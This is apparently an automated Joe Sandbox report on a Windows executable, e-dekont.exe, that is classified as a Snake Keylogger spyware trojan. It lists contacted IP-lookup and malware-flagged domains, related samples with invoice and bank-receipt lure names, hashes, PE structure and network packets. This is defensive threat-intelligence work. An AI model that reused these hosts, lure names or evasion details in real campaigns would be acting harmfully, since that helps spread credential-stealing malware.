                            https://reallyfreegeoip.orge-dekont.exe, 00000002.00000002.4088425866.0000000003124000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4088425866.0000000003116000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4088425866.0000000003160000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4088425866.00000000030AB000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4088425866.00000000030FB000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4088425866.0000000003150000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4088425866.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designers8e-dekont.exe, 00000000.00000002.1664799082.0000000006C42000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.fonts.come-dekont.exe, 00000000.00000002.1664799082.0000000006C42000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.sandoll.co.kre-dekont.exe, 00000000.00000002.1664799082.0000000006C42000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://checkip.dyndns.come-dekont.exe, 00000002.00000002.4088425866.0000000003124000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4088425866.0000000003116000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4088425866.0000000003160000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4088425866.00000000030FB000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4088425866.0000000003150000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4088425866.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.urwpp.deDPleasee-dekont.exe, 00000000.00000002.1664799082.0000000006C42000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.zhongyicts.com.cne-dekont.exe, 00000000.00000002.1664799082.0000000006C42000.00000004.00000800.00020000.00000000.sdmpfalse
                                • 1%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                		unknown
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namee-dekont.exe, 00000002.00000002.4088425866.0000000002FA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.sakkal.come-dekont.exe, 00000000.00000002.1664799082.0000000006C42000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000000.00000002.1664762334.00000000054D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://scratchdreams.tke-dekont.exe, 00000002.00000002.4088425866.0000000003160000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • 17%, Virustotal, Browse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://reallyfreegeoip.org/xml/e-dekont.exe, 00000000.00000002.1662409618.00000000044BE000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4086321706.0000000000402000.00000040.00000400.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4088425866.0000000003068000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  104.21.67.152
                                  		reallyfreegeoip.orgUnited States
                                  		13335CLOUDFLARENETUSfalse
                                  158.101.44.242
                                  		checkip.dyndns.comUnited States
                                  		31898ORACLE-BMC-31898USfalse
                                  104.21.27.85
                                  		scratchdreams.tkUnited States
                                  		13335CLOUDFLARENETUSfalse

                                  General Information

                                  Joe Sandbox version:40.0.0 Tourmaline
                                  Analysis ID:1430774
                                  Start date and time:2024-04-24 07:08:16 +02:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 9m 16s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:7
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:e-dekont.exe
                                  Detection:MAL
                                  Classification:mal100.troj.spyw.evad.winEXE@3/1@4/3
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HCA Information:
                                  • Successful, ratio: 99%
                                  • Number of executed functions: 211
                                  • Number of non-executed functions: 73
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Override analysis time to 240000 for current running targets taking high CPU consumption

                                  Warnings

                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • Report size getting too big, too many NtReadVirtualMemory calls found.

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  07:09:05API Interceptor9800589x Sleep call for process: e-dekont.exe modified

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  104.21.67.152rSyDiExlek.exeGet hashmaliciousSnake KeyloggerBrowse
                                    edlyEKgpaz.exeGet hashmaliciousSnake KeyloggerBrowse
                                      edlyEKgpaz.exeGet hashmaliciousSnake KeyloggerBrowse
                                        58208 Teklif.exeGet hashmaliciousSnake KeyloggerBrowse
                                          Zarefy4bOs.exeGet hashmaliciousSnake KeyloggerBrowse
                                            SAT8765456000.xlam.xlsxGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                              Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                  1d4D5ndo0x.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                    D09876500900000H.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                      158.101.44.242Pnihosiyvr.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                      • checkip.dyndns.org/
                                                      PsBygexGwH.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • checkip.dyndns.org/
                                                      SAT8765456000.xlam.xlsxGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                      • checkip.dyndns.org/
                                                      Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • checkip.dyndns.org/
                                                      lxdriver_setup.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                                      • checkip.dyndns.org/
                                                      Hitomi Downloader.exeGet hashmaliciousAgent Tesla, AgentTesla, RisePro StealerBrowse
                                                      • checkip.dyndns.org/
                                                      e-dekont.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • checkip.dyndns.org/
                                                      Payment_Draft_confirmation.xla.xlsxGet hashmaliciousSnake KeyloggerBrowse
                                                      • checkip.dyndns.org/
                                                      ATM Dekont E-Maili pdf.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                      • checkip.dyndns.org/
                                                      Halkbank_Ekstre_20240312_081829_752731.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • checkip.dyndns.org/

                                                      Domains

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      checkip.dyndns.comATTHACHED SCAN-P.O SPECIFICATIONS.009.24. 001.docGet hashmaliciousSnake KeyloggerBrowse
                                                      • 193.122.6.168
                                                      order.exeGet hashmaliciousUnknownBrowse
                                                      • 158.101.44.242
                                                      0FvHGK2cyk.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                                      • 193.122.6.168
                                                      M0uVrW4HJb.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                                      • 132.226.247.73
                                                      rSyDiExlek.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 132.226.247.73
                                                      sample1.exeGet hashmaliciousSeclesBot, TrojanRansomBrowse
                                                      • 132.226.247.73
                                                      UbMsBrTi5s.exeGet hashmaliciousUnknownBrowse
                                                      • 193.122.6.168
                                                      Pnihosiyvr.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                      • 158.101.44.242
                                                      BmLue8t2V7.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 132.226.247.73
                                                      gZIZ5eyCtS.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 193.122.6.168
                                                      scratchdreams.tkrSyDiExlek.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 172.67.169.18
                                                      PsBygexGwH.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 104.21.27.85
                                                      58208 Teklif.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 172.67.169.18
                                                      Zarefy4bOs.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 104.21.27.85
                                                      Remittance_copy.pdf.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 104.21.27.85
                                                      Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 104.21.27.85
                                                      Fuy2BDS9W2.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                      • 104.21.27.85
                                                      Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 104.21.27.85
                                                      Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 104.21.27.85
                                                      Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 172.67.169.18
                                                      reallyfreegeoip.orgrSyDiExlek.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 104.21.67.152
                                                      Pnihosiyvr.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                      • 172.67.177.134
                                                      BmLue8t2V7.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 172.67.177.134
                                                      gZIZ5eyCtS.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 172.67.177.134
                                                      edlyEKgpaz.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 104.21.67.152
                                                      edlyEKgpaz.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 104.21.67.152
                                                      PsBygexGwH.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 172.67.177.134
                                                      58208 Teklif.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 104.21.67.152
                                                      Zarefy4bOs.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 104.21.67.152
                                                      Remittance_copy.pdf.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 172.67.177.134

                                                      ASNs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      CLOUDFLARENETUSNew Order .docGet hashmaliciousUnknownBrowse
                                                      • 172.67.134.136
                                                      orden de compra.vbsGet hashmaliciousAgentTeslaBrowse
                                                      • 104.21.84.67
                                                      DHL Shipping doc.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                      • 104.26.13.205
                                                      Reconfirm Details.vbsGet hashmaliciousAgentTeslaBrowse
                                                      • 172.67.215.45
                                                      Remittance-Advice.docGet hashmaliciousUnknownBrowse
                                                      • 172.67.175.222
                                                      shipping docs.docGet hashmaliciousUnknownBrowse
                                                      • 104.21.74.191
                                                      Invoice.docGet hashmaliciousAgentTeslaBrowse
                                                      • 172.67.134.136
                                                      Pedido02304024.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 172.67.152.117
                                                      purchase order pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 104.26.12.205
                                                      PO 23JC0704-Rollease-B.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 104.26.13.205
                                                      ORACLE-BMC-31898USSecuriteInfo.com.Trojan.MSIL.zgRAT.Heur.21652.15881.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                      • 192.29.11.142
                                                      Remittance. #U0440df.htmlGet hashmaliciousHTMLPhisherBrowse
                                                      • 193.122.130.38
                                                      ATTHACHED SCAN-P.O SPECIFICATIONS.009.24. 001.docGet hashmaliciousSnake KeyloggerBrowse
                                                      • 193.122.6.168
                                                      pGTQLD9ukH.elfGet hashmaliciousMiraiBrowse
                                                      • 193.122.239.120
                                                      pJNcZyhUh8.elfGet hashmaliciousMiraiBrowse
                                                      • 193.122.239.110
                                                      g2PqnVy6cQ.elfGet hashmaliciousMirai, OkiruBrowse
                                                      • 144.25.156.10
                                                      b3astmode.x86.elfGet hashmaliciousUnknownBrowse
                                                      • 168.138.235.164
                                                      order.exeGet hashmaliciousUnknownBrowse
                                                      • 158.101.44.242
                                                      KSRRrEMt1w.elfGet hashmaliciousMiraiBrowse
                                                      • 147.154.227.149
                                                      4QuhksnsA6.elfGet hashmaliciousUnknownBrowse
                                                      • 130.61.64.122
                                                      CLOUDFLARENETUSNew Order .docGet hashmaliciousUnknownBrowse
                                                      • 172.67.134.136
                                                      orden de compra.vbsGet hashmaliciousAgentTeslaBrowse
                                                      • 104.21.84.67
                                                      DHL Shipping doc.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                      • 104.26.13.205
                                                      Reconfirm Details.vbsGet hashmaliciousAgentTeslaBrowse
                                                      • 172.67.215.45
                                                      Remittance-Advice.docGet hashmaliciousUnknownBrowse
                                                      • 172.67.175.222
                                                      shipping docs.docGet hashmaliciousUnknownBrowse
                                                      • 104.21.74.191
                                                      Invoice.docGet hashmaliciousAgentTeslaBrowse
                                                      • 172.67.134.136
                                                      Pedido02304024.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 172.67.152.117
                                                      purchase order pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 104.26.12.205
                                                      PO 23JC0704-Rollease-B.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 104.26.13.205

                                                      JA3 Fingerprints

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      54328bd36c14bd82ddaa0c04b25ed9adSecuriteInfo.com.Win64.TrojanX-gen.11161.10776.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                      • 104.21.67.152
                                                      https://docs.google.com/presentation/d/e/2PACX-1vTSXaY7ubI0TsmtDZGhnfi1zhnSxguMyu2LhG-ysNsdY7OPzg5AMGaTqcxwu9_JVEAMwiEcyOI9wHoz/pub?start=false&loop=false&delayms=3000&slide=id.pGet hashmaliciousUnknownBrowse
                                                      • 104.21.67.152
                                                      hRsK5gPX8l.exeGet hashmaliciousXehook StealerBrowse
                                                      • 104.21.67.152
                                                      T1SEuO2fxi.exeGet hashmaliciousXehook StealerBrowse
                                                      • 104.21.67.152
                                                      T1SEuO2fxi.exeGet hashmaliciousXehook StealerBrowse
                                                      • 104.21.67.152
                                                      SecuriteInfo.com.Program.Unwanted.5412.9308.3353.exeGet hashmaliciousPureLog StealerBrowse
                                                      • 104.21.67.152
                                                      mdWXrbOxsY.exeGet hashmaliciousXehook StealerBrowse
                                                      • 104.21.67.152
                                                      mdWXrbOxsY.exeGet hashmaliciousXehook StealerBrowse
                                                      • 104.21.67.152
                                                      M0uVrW4HJb.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                                      • 104.21.67.152
                                                      Hj8wbvoT1k.exeGet hashmaliciousXehook StealerBrowse
                                                      • 104.21.67.152
                                                      3b5074b1b5d032e5620f69f9f700ff0eDAIKIN AC SPAIN 2024.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                      • 104.21.27.85
                                                      transferencia.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                      • 104.21.27.85
                                                      1000901 LIQUIDACION.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 104.21.27.85
                                                      Zapytanie ofertowe (7427-23 ROCKFIN).vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                      • 104.21.27.85
                                                      Factura240413227178.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                      • 104.21.27.85
                                                      JUSTIFICANTE DE PAGO.vbsGet hashmaliciousUnknownBrowse
                                                      • 104.21.27.85
                                                      JUSTIFICANTE DE PAGO.vbsGet hashmaliciousUnknownBrowse
                                                      • 104.21.27.85
                                                      orden de compra.vbsGet hashmaliciousAgentTeslaBrowse
                                                      • 104.21.27.85
                                                      FT. 40FE CNY .xlsx.lnkGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                      • 104.21.27.85
                                                      DHL Shipping doc.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                      • 104.21.27.85

                                                      Dropped Files

                                                      No context

                                                      Created / dropped Files

                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\e-dekont.exe.log

                                                      Download File
                                                      Process:C:\Users\user\Desktop\e-dekont.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):1415
                                                      Entropy (8bit):5.352427679901606
                                                      Encrypted:false
                                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRuAE4KzecKIE4oKNzKorE4x84j:MIHK5HKH1qHiYHKh3oPHKMRuAHKzectP
                                                      MD5:3978978DE913FD1C068312697D6E5917
                                                      SHA1:1DABBE7FB8F38F6EBF474CE5F0ECAA89F48E2538
                                                      SHA-256:33B7B1668DDD3AB39711F9F93B667F6F2F674348A79228BFA163BA625B37F120
                                                      SHA-512:78694B97F5D03758F503155E5CE5B85AABDF9690F0DFBC51FCE9926BE2D86BCF99E008659420F1E8489A7F6EA125F2776D4C6DC4B151566B529454512352953D
                                                      Malicious:false
                                                      Reputation:moderate, very likely benign file
                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll"

                                                      Static File Info

                                                      General

                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Entropy (8bit):7.306258701957308
                                                      TrID:
                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                      • DOS Executable Generic (2002/1) 0.01%
                                                      File name:e-dekont.exe
                                                      File size:854'528 bytes
                                                      MD5:ff53d6a04ea8618890f7a81e31bd8a22
                                                      SHA1:d804959bcb8a2ea43278a1f78aac8abede4fa62f
                                                      SHA256:5f8e6d5fd79a5a648e42597881ddf5e418be34a81b678b9742fad39d6b74c298
                                                      SHA512:fb1830954a5568b13448fc3326a66b7730081cc432aeca6de3cefde5b3ee7f44a9fe95c8d8ec53bbd293be3f931f0dcc890bf3c612593d07d897c6939cddce45
                                                      SSDEEP:12288:WUF9WM9gnUHf/6JCh+bLNftlDcaxlCcjbAf:WU2M9gUHf/6tLTlYklCQbA
                                                      TLSH:9E055DD1F1908C9AEC6B45F1BD2BA53024A7BE9C54A4810C569DBB1B76F3342209FE0F
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..z..........^.... ........@.. .......................`............@................................

                                                      File Icon

                                                      Icon Hash:aea4accc16a3d9be

                                                      Static PE Info

                                                      General

                                                      Entrypoint:0x48985e
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0xFFD1EFAD [Sun Jan 3 07:54:21 2106 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                      Entrypoint Preview

                                                      Instruction
                                                      jmp dword ptr [00402000h]
                                                      xor al, 47h
                                                      inc ecx
                                                      inc edi
                                                      dec eax
                                                      inc ebp
                                                      xor eax, 484E3531h
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [edx], dh
                                                      push esp
                                                      xor eax, 43433753h
                                                      xor al, 52h
                                                      cmp byte ptr [00000000h], dh
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al

                                                      Data Directories

                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x8980b0x4f.text
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x8a0000x48a9c.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xd40000xc.reloc
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x87f540x70.text
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                      Sections

                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x20000x878840x87a00609fa1264cead6e51821cae68d6406cbFalse0.956534418202765data7.955212716673103IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                      .rsrc0x8a0000x48a9c0x48c007bcb8306eac410c29277665bf1a7daa8False0.06319802405498282data4.771389778446598IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .reloc0xd40000xc0x2009c9f291ae09cb1d0c331ef9ed0a8f644False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                      Resources

                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                      RT_ICON0x8a2e00x668Device independent bitmap graphic, 48 x 96 x 4, image size 00.1798780487804878
                                                      RT_ICON0x8a9480x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 00.2513440860215054
                                                      RT_ICON0x8ac300x128Device independent bitmap graphic, 16 x 32 x 4, image size 00.3918918918918919
                                                      RT_ICON0x8ad580xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.3200959488272921
                                                      RT_ICON0x8bc000x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.33664259927797835
                                                      RT_ICON0x8c4a80x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.2622832369942196
                                                      RT_ICON0x8ca100x42028Device independent bitmap graphic, 256 x 512 x 32, image size 00.04393141403083114
                                                      RT_ICON0xcea380x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.18786307053941909
                                                      RT_ICON0xd0fe00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.2453095684803002
                                                      RT_ICON0xd20880x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.3484042553191489
                                                      RT_GROUP_ICON0xd24f00x92data0.5753424657534246
                                                      RT_VERSION0xd25840x32cdata0.4273399014778325
                                                      RT_MANIFEST0xd28b00x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                      Imports

                                                      DLLImport
                                                      mscoree.dll_CorExeMain

                                                      Network Behavior

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Apr 24, 2024 07:09:07.181435108 CEST4973280192.168.2.4158.101.44.242
                                                      Apr 24, 2024 07:09:07.348988056 CEST8049732158.101.44.242192.168.2.4
                                                      Apr 24, 2024 07:09:07.349075079 CEST4973280192.168.2.4158.101.44.242
                                                      Apr 24, 2024 07:09:07.349437952 CEST4973280192.168.2.4158.101.44.242
                                                      Apr 24, 2024 07:09:07.513376951 CEST8049732158.101.44.242192.168.2.4
                                                      Apr 24, 2024 07:09:07.515300989 CEST8049732158.101.44.242192.168.2.4
                                                      Apr 24, 2024 07:09:07.519253016 CEST4973280192.168.2.4158.101.44.242
                                                      Apr 24, 2024 07:09:07.691046953 CEST8049732158.101.44.242192.168.2.4
                                                      Apr 24, 2024 07:09:07.740633965 CEST4973280192.168.2.4158.101.44.242
                                                      Apr 24, 2024 07:09:07.886545897 CEST49734443192.168.2.4104.21.67.152
                                                      Apr 24, 2024 07:09:07.886574984 CEST44349734104.21.67.152192.168.2.4
                                                      Apr 24, 2024 07:09:07.887192965 CEST49734443192.168.2.4104.21.67.152
                                                      Apr 24, 2024 07:09:07.894962072 CEST49734443192.168.2.4104.21.67.152
